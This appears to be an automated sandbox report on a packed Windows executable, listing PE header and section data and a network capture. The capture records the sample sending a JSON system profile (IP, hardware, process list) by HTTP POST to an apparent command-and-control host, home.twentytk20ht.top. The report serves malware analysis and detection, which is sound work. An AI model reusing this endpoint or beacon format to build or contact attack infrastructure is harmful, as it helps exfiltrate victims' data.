Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x67639807 [Thu Dec 19 03:50:31 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                        Instruction
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x72b05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x72a000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc69ae0 | 0x10 | oshltrdl
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc69a90 | 0x18 | oshltrdl
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x729000 | 0x283400 | 78c914d9a6df8331ffe73540eba4b291 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x72a000 | 0x2b0 | 0x200 | e2bc4d8f19b04c07bda9991dbf3d9d29 | False | 0.8046875 | data | 6.067961488125973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x72b000 | 0x1000 | 0x200 | d6de82d14e357527731a70b0d9d5c0e8 | False | 0.166015625 | data | 1.1589685166080708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x72c000 | 0x385000 | 0x200 | ebe41fc7de3bfdfab4a836d63861562b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
oshltrdl | 0xab1000 | 0x1b9000 | 0x1b8e00 | 4d6963733beaaa4dbc36b8a1be738dd5 | False | 0.9944817435143182 | data | 7.955137749688428 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ifmqqwjz | 0xc6a000 | 0x1000 | 0x600 | 5228844af41ddb4df2ec620a994aa57a | False | 0.5774739583333334 | data | 5.074555642628291 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc6b000 | 0x3000 | 0x2200 | cfb973bc75464ed0dc28ebc39b4842d9 | False | 0.06571691176470588 | DOS executable (COM) | 0.8564687271181977 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc69af0 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535

DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Dec 23, 2024 06:54:21.238131046 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.238158941 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.238202095 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.238215923 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.238271952 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.238329887 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.238411903 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.238428116 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.238552094 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.238568068 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.238687992 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.238828897 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.238902092 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.238953114 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.238966942 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.239015102 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.239059925 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.239068985 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.239147902 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.239253998 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.239281893 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.239300966 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.239348888 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.356960058 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.357054949 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.357278109 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.357306957 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.357322931 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.357336044 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.357340097 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.357359886 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.357361078 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.357383966 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.357417107 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.357561111 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.357747078 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.357834101 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.357930899 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.357958078 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358004093 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358082056 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358118057 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358206987 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358217001 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358475924 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.358556986 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358577967 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358612061 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.358627081 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.358643055 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358669043 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358690977 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.358716965 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.358731985 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358747005 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358776093 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.358792067 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.358829975 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358840942 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358872890 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358875990 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.358886957 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.358887911 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.358911991 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.358935118 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.359003067 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359016895 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359035969 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359051943 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.359081030 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.359086037 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359093904 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.359103918 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359117031 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359153032 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359162092 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359270096 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359304905 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359447002 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359460115 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359503984 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359535933 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359601974 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359613895 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359644890 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359666109 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359715939 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359744072 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359812021 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359863997 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359873056 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359891891 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359972954 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.359982967 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.360024929 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.360034943 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.360068083 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.360137939 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.360224009 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.360289097 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.360408068 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.360481024 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.476876974 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.476996899 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.477056026 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.477122068 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.477132082 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.477160931 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.477189064 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.477205038 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.477307081 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.477747917 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.477828026 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.478471041 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478486061 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478503942 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478522062 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478534937 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478550911 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478568077 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478578091 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478598118 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478610992 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478621960 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478645086 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478656054 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478677988 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478688955 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478705883 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478720903 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478738070 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478785992 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478797913 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478811979 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478835106 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478847027 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478859901 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478879929 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.478959084 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479020119 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479036093 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479057074 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479113102 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479125977 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479221106 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479234934 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479260921 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479279041 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479325056 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479340076 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479372978 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479397058 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479463100 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479475021 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479520082 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479566097 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479621887 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479697943 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479713917 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479758978 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479773998 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479790926 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479846001 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479861975 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479871035 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479883909 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.479989052 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.480262041 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.480330944 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:21.597349882 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.597362995 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.597382069 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.597392082 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.597508907 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.597526073 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.597634077 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.597651005 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.597722054 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.597732067 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.597889900 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.597929001 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598025084 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598078966 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598169088 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598179102 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598364115 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598404884 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598546028 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598556042 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598601103 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598680973 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598721027 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598822117 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598831892 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598849058 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598907948 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.598954916 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599013090 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599021912 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599075079 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599091053 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599179983 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599189997 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599307060 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599411011 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599421024 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599426985 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599448919 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599458933 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599540949 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599558115 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599633932 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599651098 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599777937 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599787951 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599858999 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599869013 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599912882 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599922895 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.599998951 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.600014925 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.600100994 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.600209951 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.600219965 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.600291967 CET8049705185.121.15.192192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 06:54:16.233680964 CET | 192.168.2.8 | 1.1.1.1 | 0xd3cd | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:54:16.233781099 CET | 192.168.2.8 | 1.1.1.1 | 0xc0d2 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 23, 2024 06:54:19.871553898 CET | 192.168.2.8 | 1.1.1.1 | 0x63e8 | Standard query (0) | home.twentytk20ht.top | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:54:19.871619940 CET | 192.168.2.8 | 1.1.1.1 | 0x19e7 | Standard query (0) | home.twentytk20ht.top | 28 | IN (0x0001) | false
Dec 23, 2024 06:54:52.887320042 CET | 192.168.2.8 | 1.1.1.1 | 0x2366 | Standard query (0) | home.twentytk20ht.top | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:54:52.887399912 CET | 192.168.2.8 | 1.1.1.1 | 0xcf10 | Standard query (0) | home.twentytk20ht.top | 28 | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 06:54:16.533917904 CET | 1.1.1.1 | 192.168.2.8 | 0xd3cd | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:54:16.533917904 CET | 1.1.1.1 | 192.168.2.8 | 0xd3cd | No error (0) | httpbin.org | | 98.85.100.80 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:54:20.010340929 CET | 1.1.1.1 | 192.168.2.8 | 0x63e8 | No error (0) | home.twentytk20ht.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:54:53.028038025 CET | 1.1.1.1 | 192.168.2.8 | 0x2366 | No error (0) | home.twentytk20ht.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false

                                                        • httpbin.org
                                                        • home.twentytk20ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 185.121.15.192 | 80 | 6676 | C:\Users\user\Desktop\2OJYjm4J1B.exe

Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 06:54:20.133878946 CET | 12360 | OUT | POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                        Host: home.twentytk20ht.top
                                                        Accept: */*
                                                        Content-Type: application/json
                                                        Content-Length: 501223
                                                        Data Ascii: { "ip": "8.46.123.189", "current_time": "1734933257", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 23, 2024 06:54:52.275542974 CET | 309 | IN | HTTP/1.1 502 Bad Gateway
                                                        Server: nginx/1.22.1
                                                        Date: Mon, 23 Dec 2024 05:54:52 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49711 | 185.121.15.192 | 80 | 6676 | C:\Users\user\Desktop\2OJYjm4J1B.exe

Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 06:54:53.149091959 CET | 353 | OUT | POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                        Host: home.twentytk20ht.top
                                                        Accept: */*
                                                        Content-Type: application/json
                                                        Content-Length: 209
                                                        Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
Dec 23, 2024 06:54:54.633584023 CET | 309 | IN | HTTP/1.1 502 Bad Gateway
                                                        Server: nginx/1.22.1
                                                        Date: Mon, 23 Dec 2024 05:54:54 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49704 | 34.226.108.155 | 443 | 6676 | C:\Users\user\Desktop\2OJYjm4J1B.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:54:18 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                        Host: httpbin.org
                                                        Accept: */*
2024-12-23 05:54:18 UTC | 224 | IN | HTTP/1.1 200 OK
